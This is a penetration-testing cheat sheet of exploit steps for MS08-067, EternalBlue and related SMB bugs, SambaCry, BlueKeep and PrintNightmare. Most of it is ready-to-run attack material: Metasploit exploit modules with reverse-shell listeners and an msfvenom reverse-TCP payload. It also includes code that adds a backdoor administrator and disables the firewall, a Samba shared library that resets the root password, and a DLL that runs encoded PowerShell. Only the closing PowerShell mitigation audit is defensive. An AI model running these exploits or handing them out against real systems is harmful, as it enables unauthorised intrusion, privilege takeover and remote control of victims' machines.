Low-Hanging Fruits

net_api

CVE-2008-4250, MS08-067
Check:
$ sudo nmap -n -Pn -sV --script smb-vuln-ms08-067 10.10.13.37 -p139,445
Or
msf > use exploit/windows/smb/ms08_067_netapi
msf > set RHOSTS file:smb.txt
msf > check
Exploit:
msf > use exploit/windows/smb/ms08_067_netapi
msf > set RHOSTS file:smb.txt
msf > set LHOST eth0
msf > set LPORT 1337
msf > run

EternalBlue

CVE-2017-0144, MS17-010

MSF

Check:
$ sudo nmap -n -Pn -sV --script smb-vuln-ms17-010 10.10.13.37 -p139,445
Or
msf > use auxiliary/scanner/smb/smb_ms17_010
msf > set RHOSTS file:smb.txt
msf > set THREADS 25
msf > run
Exploit with:
msf > use exploit/windows/smb/ms17_010_eternalblue
msf > set RHOSTS file:smb.txt
msf > set LHOST eth0
msf > set LPORT 1337
msf > run

EternalRomance / EternalSynergy / EternalChampion

Exploit with ms17_010_psexec:
msf > use exploit/windows/smb/ms17_010_psexec
msf > set RHOSTS file:smb.txt
msf > set LHOST eth0
msf > set LPORT 1337
msf > run
Exploit with ms17_010_command:
msf > use auxiliary/admin/smb/ms17_010_command
msf > set RHOSTS file:smb.txt
msf > set COMMAND "net user snovvcrash Passw0rd! /add && net localgroup administrators snovvcrash /add"
msf > run

Manually

Send MSF payload and execute it with send_and_execute.py:
$ msfvenom -p windows/shell_reverse_tcp LHOST=10.10.13.37 LPORT=443 EXITFUNC=thread -f exe -a x86 --platform windows -o rev.exe
$ python send_and_execute.py 10.10.13.38 rev.exe
Or just execute commands on host via zzz_exploit.py (at least one named pipe must be accessible on target):
$ python zzz_exploit.py 192.168.1.11
zzz_exploit.py
# ...
def smb_pwn(conn, arch):
    # replace the default body with the commands to run on the target
    service_exec(conn, r'cmd /c net user snovvcrash Passw0rd! /add && cmd /c net localgroup administrators snovvcrash /add && cmd /c netsh firewall set opmode disable')
# ...
For x86 EternalBlue shellcodes use AutoBlue-MS17-010.
A patch for grabbing remote files from the victim:
$ git clone https://github.com/worawit/MS17-010.git && cd MS17-010
$ git checkout -b smb_get_file 83b3745
$ wget https://gist.github.com/snovvcrash/e910523a366844448e3a2b40685969e7/raw/e00b7b04aa5c96b0e5f21eae305448cf3c2fd4fa/zzz_smb_get_file.patch
$ git apply zzz_smb_get_file.patch

FuzzBunch (Wine)

SambaCry

CVE-2017-7494 (Samba 3.5.0 < 4.4.14/4.5.10/4.6.4)

MSF

msf > use exploit/linux/samba/is_known_pipename
msf > set SMB::AlwaysEncrypt false
msf > set SMB::ProtocolVersion 1
msf > run

Manually

Compile a .so shared library whose constructor runs as root once Samba loads it:
pwn.c
// gcc -shared -fPIC -o pwn.so pwn.c
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
// Constructor: executed automatically when the library is loaded
static void pwn() __attribute__((constructor));
static void pwn() {
    setresuid(0, 0, 0);
    system("echo 'root:Passw0rd!'|chpasswd");
}
Get real share path on the target's filesystem:
$ rpcclient -U'%' -c'netsharegetinfo ShareName' 10.10.13.37
path: /home/snovvcrash/sharename
Upload pwn.so to the target and then run the exploit:
$ pip install virtualenv
$ virtualenv -p /usr/bin/python2.7 venv
$ . venv/bin/activate
$ pip install -r requirements.txt
$ ./exploit.py -t 10.10.13.37 -e pwn.so -s ShareName -r /home/snovvcrash/sharename/pwn.so -u anonymous -p ''

BlueKeep

CVE-2019-0708
Check:
msf > use auxiliary/scanner/rdp/cve_2019_0708_bluekeep
msf > set RHOSTS file:rdp.txt
msf > set THREADS 25
msf > run
Exploit:
msf > use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
msf > set RHOSTS file:rdp.txt
msf > set LHOST eth0
msf > set LPORT 1337
msf > run

PrintNightmare

CVE-2021-1675, CVE-2021-34527

Check

CrackMapExec

$ cme smb hosts.txt -u snovvcrash -p 'Passw0rd!' -M spooler

ItWasAllADream

$ poetry run itwasalladream -d megacorp.local -u snovvcrash -p 'Passw0rd!' 192.168.1.0/24; cat "report_`date +'%Y_%m_%d_%H%M'`"* | grep -P '\d+\.\d+\.\d+\.\d+,Yes'

Exploit

C/C++

RCE (fork of the original repo):
LPE:

Python

RCE:
Usage:
1. Prepare an SMB share with anonymous authentication allowed (smbserver.py also works):
2. Generate an evil DLL: a C2 stager / add user to a privileged group (1, 2, 3, etc.) / invoke a custom command (see example below).
3. Run the exploit:
$ python CVE-2021-1675.py megacorp.local/snovvcrash:'Passw0rd!'@192.168.1.11 '\\10.10.13.37\share\pwn.dll'
pwn.c
// x86_64-w64-mingw32-gcc pwn.c -o pwn.dll -shared
#include <windows.h>
#include <stdlib.h>
#include <stdio.h>

// Default function that is executed (on its own thread) when the DLL is loaded
DWORD WINAPI Entry(LPVOID lpParam) {
    system("powershell -enc <BASE64_PWSH_CODE>");
    return 0;
}

BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) {
    switch (ul_reason_for_call) {
    case DLL_PROCESS_ATTACH:
        CreateThread(0, 0, Entry, 0, 0, 0);
        break;
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}

C#

RCE + LPE:

PowerShell

LPE:

Reproducibility

Flowchart by @wdormann:

Mitigation
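A host-side check for the PrintNightmare mitigations, added here as an example (it is not part of the original page or of any of the tools above): it reports whether the Print Spooler service is stopped and disabled and whether the Point and Print policy values are in the safe state Microsoft documented for CVE-2021-34527. The function name is my own; the registry path and value names are Microsoft's. Run it in an elevated PowerShell session.

```powershell
# Added example: audit a Windows host for PrintNightmare (CVE-2021-34527) mitigations.
# Returns a list of findings; an empty list means the host is in the recommended state.
function Test-PrintNightmareMitigation {
    [CmdletBinding()]
    param()

    $findings = @()

    # 1. Print Spooler service: the strongest mitigation is to stop and disable it
    #    on hosts that do not need to print (domain controllers in particular).
    $spooler = Get-Service -Name Spooler -ErrorAction SilentlyContinue
    if ($null -eq $spooler) {
        $findings += 'Spooler service not found (nothing to do)'
    } else {
        if ($spooler.Status -eq 'Running') {
            $findings += 'Spooler service is running'
        }
        if ($spooler.StartType -ne 'Disabled') {
            $findings += "Spooler start type is $($spooler.StartType), not Disabled"
        }
    }

    # 2. Point and Print policy values (Microsoft advisory for CVE-2021-34527 / KB5005652).
    #    Unsafe: NoWarningNoElevationOnInstall = 1, UpdatePromptSettings = 1,
    #    or RestrictDriverInstallationToAdministrators = 0.
    $pnp = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PointAndPrint'
    $expected = @{
        NoWarningNoElevationOnInstall              = 0
        UpdatePromptSettings                       = 0
        RestrictDriverInstallationToAdministrators = 1
    }
    foreach ($name in $expected.Keys) {
        $item  = Get-ItemProperty -Path $pnp -Name $name -ErrorAction SilentlyContinue
        $value = if ($null -ne $item) { $item.$name } else { $null }
        # An absent value is the safe default for all three (after the August 2021 update
        # RestrictDriverInstallationToAdministrators is treated as 1 when missing).
        if ($null -ne $value -and $value -ne $expected[$name]) {
            $findings += "$name is $value (expected $($expected[$name]))"
        }
    }

    return $findings
}

Test-PrintNightmareMitigation
```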
